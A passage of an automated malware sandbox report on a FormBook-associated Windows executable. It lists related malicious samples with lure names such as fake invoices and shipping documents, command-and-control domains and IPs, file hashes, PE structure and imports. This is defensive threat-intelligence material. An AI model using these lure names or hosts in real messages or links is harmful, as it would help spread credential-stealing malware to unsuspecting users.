• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: jpdy1E8K4A.exe
Time | Type | Description
09:53:33 | API Interceptor | 6646240x Sleep call for process: netbtugc.exe modified
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              172.191.244.62enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.lurknlarkk.xyz/jqkr/
                                                                                              DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.lurknlarkk.xyz/aol7/
                                                                                              CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.lurknlarkk.xyz/cjjz/
                                                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tekilla.wtf/fpzw/
                                                                                              AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.hermesmilano.xyz/f3mz/
                                                                                              63.250.47.40CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.brupack.online/t8b6/
                                                                                              PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
                                                                                              k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.balclub.top/n6ow/
                                                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kexweb.top/3bdq/
| | COTIZACION 290824.exe | malicious | FormBook | www.kexweb.top/3bdq/ |
| | ORDER_pdf.exe | malicious | FormBook | www.kexweb.top/mfb2/ |
| 13.248.169.48 | Pending invoices.exe | malicious | FormBook | www.extrem.tech/lwlk/ |
| 13.248.169.48 | Arrival Notice.exe | malicious | FormBook | www.firstcry.shop/e4x0/ |
| 13.248.169.48 | presupuesto urgente.exe | malicious | FormBook, GuLoader | www.sleephygienist.org/9ned/ |
| 13.248.169.48 | -pdf.bat.exe | malicious | FormBook | www.invicta.world/tcs6/ |
| 13.248.169.48 | payment copy.exe | malicious | FormBook | www.firstcry.shop/e4x0/ |
| 13.248.169.48 | Arrival Notice_pdf.exe | malicious | FormBook | www.invicta.world/aohi/ |
| 13.248.169.48 | shipping documents_pdf.exe | malicious | FormBook | www.mynotebook.shop/3q2o/ |
| 13.248.169.48 | Shipping Documents_pdf.exe | malicious | FormBook | www.sapatarias.online/3632/ |
| 13.248.169.48 | shipping notification_pdf.exe | malicious | FormBook | www.sapatarias.online/3632/ |
| 13.248.169.48 | RN# D7521-RN-00353 REV-2.exe | malicious | FormBook | www.luxe.guru/s9un/ |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| www.nobartv6.website | CITA#U00c7#U00c3O.exe | malicious | FormBook | 103.224.182.242 |
| www.nobartv6.website | Cotizaci#U00f3n.exe | malicious | FormBook | 103.224.182.242 |
| www.nobartv6.website | PAGO $830.900.exe | malicious | FormBook | 103.224.182.242 |
| www.nobartv6.website | PO #86637.exe | malicious | FormBook | 103.224.182.242 |
| www.nobartv6.website | RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exe | malicious | FormBook | 103.224.182.242 |
| www.nobartv6.website | COTIZACION 290824.exe | malicious | FormBook | 103.224.182.242 |
| www.nobartv6.website | New_Order_Big_Bag_PDF.exe | malicious | FormBook | 103.224.182.242 |
| webredir.vip.gandi.net | IRYzGMMbSw.exe | malicious | FormBook | 217.70.184.50 |
| webredir.vip.gandi.net | SOA SIL TL382920.exe | malicious | FormBook | 217.70.184.50 |
| webredir.vip.gandi.net | PO-78140924.BAT.PDF.exe | malicious | FormBook | 217.70.184.50 |
| webredir.vip.gandi.net | NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook | 217.70.184.50 |
| webredir.vip.gandi.net | CITA#U00c7#U00c3O.exe | malicious | FormBook | 217.70.184.50 |
| webredir.vip.gandi.net | rP0n___87004354.exe | malicious | FormBook | 217.70.184.50 |
| webredir.vip.gandi.net | CYTAT.exe | malicious | FormBook | 217.70.184.50 |
| webredir.vip.gandi.net | Cotizaci#U00f3n.exe | malicious | FormBook | 217.70.184.50 |
| webredir.vip.gandi.net | ES-241-29335_pdf.exe | malicious | FormBook | 217.70.184.50 |
| webredir.vip.gandi.net | RECIEPT.PDF.exe | malicious | FormBook | 217.70.184.50 |
| www.elsupertodo.net | CITA#U00c7#U00c3O.exe | malicious | FormBook | 148.72.152.174 |
| www.elsupertodo.net | CYTAT.exe | malicious | FormBook | 148.72.152.174 |
| www.elsupertodo.net | Cotizaci#U00f3n.exe | malicious | FormBook | 148.72.152.174 |
| www.elsupertodo.net | PO# Q919240.exe | malicious | FormBook | 148.72.152.174 |
| www.elsupertodo.net | PAGO $830.900.exe | malicious | FormBook | 148.72.152.174 |
| www.elsupertodo.net | FATURALAR PDF.exe | malicious | FormBook | 148.72.152.174 |
| www.elsupertodo.net | PO #86637.exe | malicious | FormBook | 148.72.152.174 |
| www.elsupertodo.net | COTIZACION 290824.exe | malicious | FormBook | 148.72.152.174 |
| www.elsupertodo.net | COTIZACION 280824.exe | malicious | FormBook | 148.72.152.174 |
| www.kexweb.top | CITA#U00c7#U00c3O.exe | malicious | FormBook | 63.250.47.40 |
| www.kexweb.top | CYTAT.exe | malicious | FormBook | 63.250.47.40 |
| www.kexweb.top | Cotizaci#U00f3n.exe | malicious | FormBook | 63.250.47.40 |
| www.kexweb.top | PO# Q919240.exe | malicious | FormBook | 63.250.47.40 |
| www.kexweb.top | PAGO $830.900.exe | malicious | FormBook | 63.250.47.40 |
| www.kexweb.top | PO #86637.exe | malicious | FormBook | 63.250.47.40 |
| www.kexweb.top | COTIZACION 290824.exe | malicious | FormBook | 63.250.47.40 |
| www.kexweb.top | ORDER_pdf.exe | malicious | FormBook | 63.250.47.40 |
| www.kexweb.top | ORDER_38746_pdf.exe | malicious | FormBook | 63.250.47.40 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| ATT-INTERNET4US | enkJ6J7dAn.exe | malicious | FormBook | 172.191.244.62 |
| ATT-INTERNET4US | https://simpleinvoices.io/invoices/gvexd57Lej7 | malicious | Unknown | 13.32.23.51 |
| ATT-INTERNET4US | na.elf | malicious | Unknown | 13.184.113.170 |
| ATT-INTERNET4US | na.elf | malicious | Unknown | 64.216.147.20 |
| ATT-INTERNET4US | na.elf | malicious | Unknown | 63.197.31.26 |
| ATT-INTERNET4US | na.elf | malicious | Unknown | 68.120.188.218 |
| ATT-INTERNET4US | na.elf | malicious | Unknown | 99.178.79.220 |
| ATT-INTERNET4US | na.elf | malicious | Unknown | 99.59.85.179 |
| ATT-INTERNET4US | https://we.tl/t-BVtGtb0HLz | malicious | Unknown | 13.32.27.128 |
| ATT-INTERNET4US | na.elf | malicious | Unknown | 99.91.154.112 |
| AMAZON-02US | tyRPPK48Mk.exe | malicious | Remcos | 18.141.10.107 |
| AMAZON-02US | PO59458.exe | malicious | FormBook | 3.131.150.69 |
| AMAZON-02US | Remittance_Raveis.htm | malicious | Unknown | 3.160.212.126 |
| AMAZON-02US | https://support.squarespacrenewel.retroestyle.com/?DTYUI0=RTDM45 | malicious | Unknown | 3.124.134.230 |
| AMAZON-02US | file.exe | malicious | Credential Flusher | 52.222.236.120 |
| AMAZON-02US | https://simpleinvoices.io/invoices/gvexd57Lej7 | malicious | Unknown | 18.202.131.124 |
| AMAZON-02US | FIR-069114.pdf | malicious | HTMLPhisher | 3.5.184.28 |
| AMAZON-02US | file.exe | malicious | Credential Flusher | 52.222.236.120 |
| AMAZON-02US | file.exe | malicious | Credential Flusher | 52.222.236.23 |
| AMAZON-02US | na.elf | malicious | Unknown | 34.249.145.219 |
| HOSTNETNL | https://polidos.com/ | malicious | Unknown | 91.184.0.111 |
| HOSTNETNL | CITA#U00c7#U00c3O.exe | malicious | FormBook | 91.184.0.200 |
| HOSTNETNL | CYTAT.exe | malicious | FormBook | 91.184.0.200 |
| HOSTNETNL | Cotizaci#U00f3n.exe | malicious | FormBook | 91.184.0.200 |
| HOSTNETNL | PAGO $830.900.exe | malicious | FormBook | 91.184.0.200 |
| HOSTNETNL | FATURALAR PDF.exe | malicious | FormBook | 91.184.0.200 |
| HOSTNETNL | PASU5160894680 DOCS.scr.exe | malicious | FormBook | 91.184.0.200 |
| HOSTNETNL | z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe | malicious | FormBook | 91.184.0.111 |
| HOSTNETNL | firmware.x86_64.elf | malicious | Unknown | 91.184.0.99 |
| HOSTNETNL | PO #86637.exe | malicious | FormBook | 91.184.0.200 |
| NAMECHEAP-NETUS | N2Qncau2rN.exe | malicious | FormBook | 199.192.19.19 |
| NAMECHEAP-NETUS | q6utlq83i0.exe | malicious | Unknown | 198.54.122.135 |
| NAMECHEAP-NETUS | RQ#071024.exe | malicious | FormBook | 162.0.238.43 |
| NAMECHEAP-NETUS | 8mmZ7Bkoj1.exe | malicious | FormBook | 199.192.21.169 |
| NAMECHEAP-NETUS | FDA.exe | malicious | FormBook | 198.54.125.199 |
| NAMECHEAP-NETUS | PURCHASED ORDER OF ENG091.exe | malicious | FormBook | 63.250.38.167 |
| NAMECHEAP-NETUS | na.elf | malicious | Mirai | 162.255.117.53 |
| NAMECHEAP-NETUS | PO_89_202876.Pdf.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 198.54.114.247 |
| NAMECHEAP-NETUS | Products Order Catalogs20242.exe | malicious | FormBook | 68.65.122.222 |
| NAMECHEAP-NETUS | IRYzGMMbSw.exe | malicious | FormBook | 162.213.249.216 |
                                                                                              No context
                                                                                              No context
                                                                                              Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                              Category:dropped
                                                                                              Size (bytes):196608
                                                                                              Entropy (8bit):1.1239949490932863
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                              MD5:271D5F995996735B01672CF227C81C17
                                                                                              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
Preview:
                                                                                              Process:C:\Users\user\Desktop\jpdy1E8K4A.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):286720
                                                                                              Entropy (8bit):7.992290227032119
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:2nZ3Rc4FocdAlupRK/efVB7jgRqLCos9xWQ88NCnuAdmGcvVW8h1e+tTu:2nXFZAwRtBBa9IXiLGIDer
                                                                                              MD5:013D105DD28C87E68C95FB7879662786
                                                                                              SHA1:2103D44500085E108FC70A45A7A7AF6EA7F19310
                                                                                              SHA-256:6852467E78642E5B6713DCCE5E36C0629DD360640CBFE6DE313709D424E44DE5
                                                                                              SHA-512:06B97E4424BCDB1348ED47406EA914D732AF9DAC1943E53C81D4D895493AB024CFFBE0E08125243B1879FB0D73EF3C8FC32246143994F0A57A6BC5058B06473E
                                                                                              Malicious:false
                                                                                              Reputation:low
Preview:
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.560757969280412
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:jpdy1E8K4A.exe
                                                                                              File size:1'401'503 bytes
                                                                                              MD5:473df0a675ceaba5a7c27f100e7d7491
                                                                                              SHA1:a3f60109a59e91a0e6443367b42a0ee8fd3feae6
                                                                                              SHA256:64cccb8039b0fa277f21e1dccbeec520d08d2606dac35912b147372c03e53f56
                                                                                              SHA512:3bb5f3914c2bc5e4c2ed51382e55a056b60a63dd3b970f1272d993150c39c8a38a2c685b0869ddc7b56949b51d894837faa531fd4316996859c83335a62f1568
                                                                                              SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCWzivG941U4b1LpUthnHerb1TcxJlp:7JZoQrbTFZY1iaCWzGNJLiT+PMh
                                                                                              TLSH:1A55F121B6C68036C2B326719E7EF3699A3D79360337D1D727C82D265EA05416B39B33
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                              Icon Hash:1733312925935517
                                                                                              Entrypoint:0x4165c1
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:0
                                                                                              File Version Major:5
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
Instruction
    call 00007F27BC8C7B2Bh
    jmp 00007F27BC8BE99Eh
    int3
    int3
    int3
    int3
    int3
    push ebp
    mov ebp, esp
    push edi
    push esi
    mov esi, dword ptr [ebp+0Ch]
    mov ecx, dword ptr [ebp+10h]
    mov edi, dword ptr [ebp+08h]
    mov eax, ecx
    mov edx, ecx
    add eax, esi
    cmp edi, esi
    jbe 00007F27BC8BEB1Ah
    cmp edi, eax
    jc 00007F27BC8BECB6h
    cmp ecx, 00000080h
    jc 00007F27BC8BEB2Eh
    cmp dword ptr [004A9724h], 00000000h
    je 00007F27BC8BEB25h
    push edi
    push esi
    and edi, 0Fh
    and esi, 0Fh
    cmp edi, esi
    pop esi
    pop edi
    jne 00007F27BC8BEB17h
    jmp 00007F27BC8BEEF2h
    test edi, 00000003h
    jne 00007F27BC8BEB26h
    shr ecx, 02h
    and edx, 03h
    cmp ecx, 08h
    jc 00007F27BC8BEB3Bh
    rep movsd
    jmp dword ptr [00416740h+edx*4]
    mov eax, edi
    mov edx, 00000003h
    sub ecx, 04h
    jc 00007F27BC8BEB1Eh
    and eax, 03h
    add ecx, eax
    jmp dword ptr [00416654h+eax*4]
    jmp dword ptr [00416750h+ecx*4]
    nop
    jmp dword ptr [004166D4h+ecx*4]
    nop
    inc cx
    add byte ptr [eax-4BFFBE9Ah], dl
    inc cx
    add byte ptr [ebx], ah
    ror dword ptr [edx-75F877FAh], 1
    inc esi
    add dword ptr [eax+468A0147h], ecx
    add al, cl
    jmp 00007F27BED37317h
    add esi, 03h
    add edi, 03h
    cmp ecx, 08h
    jc 00007F27BC8BEADEh
    rep movsd
    jmp dword ptr [00000000h+edx*4]
Programming Language:
• [ C ] VS2010 SP1 build 40219
• [C++] VS2010 SP1 build 40219
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
